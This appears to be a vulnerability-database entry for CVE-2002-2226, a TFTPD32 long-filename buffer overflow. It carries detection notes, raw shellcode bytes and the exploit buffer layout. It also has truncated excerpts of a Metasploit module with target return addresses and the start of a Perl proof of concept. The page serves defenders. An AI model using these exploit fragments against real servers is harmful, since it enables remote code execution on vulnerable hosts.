CVE-2002-2226
published 2002-12-31CVE-2002-2226: Buffer overflow in tftpd of TFTP32 2.21 and earlier allows remote attackers to execute arbitrary code via a long filename argument.
PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
63.48%
99.1th percentile
Buffer overflow in tftpd of TFTP32 2.21 and earlier allows remote attackers to execute arbitrary code via a long filename argument.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| philippe_jounin | tftpd32 | <= 2.74 | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| philippe_jounin | tftpd32 | — | — |
| tftpd32 | tftpd32 | <= 2.21 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x01 (TFTP RRQ opcode) followed by long filename buffer
bytes↗
\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB\xFD\xE8\xD4\xFF\xFF\xFF
bytes↗
\x00\x01 + rand_text_english(120) + "." + rand_text_english(135) + [ret].pack('V') + payload + \x00- →Detect oversized TFTP RRQ (opcode 0x0001) or WRQ (opcode 0x0002) packets on UDP/69 where the filename field exceeds normal bounds (~255 bytes); the exploit sends 120+ bytes before a '.' separator followed by 135+ bytes. ↗
- →Alert on TFTP packets to UDP port 69 containing the shellcode byte sequence starting with \xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2. ↗
- →The exploit payload BadChars is only \x00; any non-null byte sequence of 250+ bytes appended after a TFTP RRQ opcode on UDP/69 targeting TFTPD32 is suspicious. ↗
- →The Metasploit module uses EXITFUNC=process and a StackAdjustment of -3500, which is characteristic of this specific exploit's stack pivot behaviour and can be used as a behavioral detection signal. ↗
- →Monitor for TFTP RRQ/WRQ packets on UDP/69 where the total packet length is anomalously large (well beyond the 512-byte TFTP block size or a normal filename length), indicating a buffer overflow attempt against TFTPD32. ↗
- ·The PoC exploit hardcodes a target IP and uses a fixed offset (116 'A's + '.' + 140 'A's for EIP), meaning the exact buffer layout may differ from the Metasploit module offsets (120 + '.' + 135). Detections based on exact byte offsets should account for both variants. ↗
- ·The CVE affects TFTPD32 version 2.21 and earlier per NVD, but the Exploit-DB title references version 2.50, suggesting the vulnerability or a variant may affect a broader version range than originally documented. ↗
- ·The return addresses in the Metasploit module are OS/SP-specific hardcoded values; exploitation will only succeed against the exact listed Windows targets (NT4 SP6a, 2000 SP4, XP SP0, XP SP1 English). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-35x5-8hjg-m53r: tftpd in Philippe Jounin Tftpd32 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2005-4882 [HIGH] CWE-119 GHSA-35x5-8hjg-m53r: tftpd in Philippe Jounin Tftpd32 2
tftpd in Philippe Jounin Tftpd32 2.74 and earlier, as used in Wyse Simple Imager (WSI) and other products, allows remote attackers to cause a denial of service (daemon crash) via a long filename in a TFTP read (aka RRQ or get) request, a different vulnerability than CVE-2002-2226.
GHSA
GHSA-w2mh-pcg2-v2jv: Buffer overflow in tftpd of TFTP32 2
ghsa_unreviewed·2022-04-30
CVE-2002-2226 [HIGH] CWE-119 GHSA-w2mh-pcg2-v2jv: Buffer overflow in tftpd of TFTP32 2
Buffer overflow in tftpd of TFTP32 2.21 and earlier allows remote attackers to execute arbitrary code via a long filename argument.
No detection rules found.
Exploit-DB
TFTPD32 < 2.21 - 'Filename' Remote Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2002-2226 TFTPD32 < 2.21 - 'Filename' Remote Buffer Overflow (Metasploit)
TFTPD32 'TFTPD32 %q{
This module exploits a stack buffer overflow in TFTPD32 version 2.21
and prior. By sending a request for an overly long file name
to the tftpd32 server, a remote attacker could overflow a buffer and
execute arbitrary code on the system.
},
'Author' => 'MC',
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2002-2226'],
['OSVDB', '45903'],
['BID', '6199'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 250,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows NT 4.0 SP6a English', { 'Ret' => 0x77f9d463} ],
['Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663} ],
['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0} ],
['Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527} ],
],
'P
Exploit-DB
TFTPD32 2.50 - 'Filename' Remote Buffer Overflow
exploitdb·2002-11-19
CVE-2002-2226 TFTPD32 2.50 - 'Filename' Remote Buffer Overflow
TFTPD32 2.50 - 'Filename' Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/6199/info
A buffer-overflow vulnerability has been reported for Tftpd32. The vulnerability is due to insufficient checks on user-supplied input.
A remote attacker can exploit this vulnerability by supplying a long string as a name of the file to retrieve. This will trigger the buffer-overflow condition. Any malicious attacker-supplied code will be executed with the privileges of the Tftpd32 process.
#!/usr/bin/perl
#TFTP Server remote Buffer Overflow
use IO::Socket;
$host = "192.168.1.53";
$port = "69";
$data = "A";
#$buf .= "\x00\x02"; # Send ---- Choose one
$buf .= "\x00\x01"; # Recieve
$buf .= "A";
$num = "116";
$buf .= $data x $num;
$buf .= ".";
$num = "140"; # EIP section
$buf .= $dat
Metasploit
TFTPD32 Long Filename Buffer Overflow
metasploit
TFTPD32 Long Filename Buffer Overflow
TFTPD32 Long Filename Buffer Overflow
This module exploits a stack buffer overflow in TFTPD32 version 2.21 and prior. By sending a request for an overly long file name to the tftpd32 server, a remote attacker could overflow a buffer and execute arbitrary code on the system.
No writeups or analysis indexed.
http://securityreason.com/securityalert/3160http://tftpd32.jounin.net/http://www.kb.cert.org/vuls/id/632633http://www.securiteam.com/windowsntfocus/6C00C2061A.htmlhttp://www.securityfocus.com/archive/1/300395http://www.securityfocus.com/bid/6199https://exchange.xforce.ibmcloud.com/vulnerabilities/10647http://securityreason.com/securityalert/3160http://tftpd32.jounin.net/http://www.kb.cert.org/vuls/id/632633http://www.securiteam.com/windowsntfocus/6C00C2061A.htmlhttp://www.securityfocus.com/archive/1/300395http://www.securityfocus.com/bid/6199https://exchange.xforce.ibmcloud.com/vulnerabilities/10647
2002-12-31
Published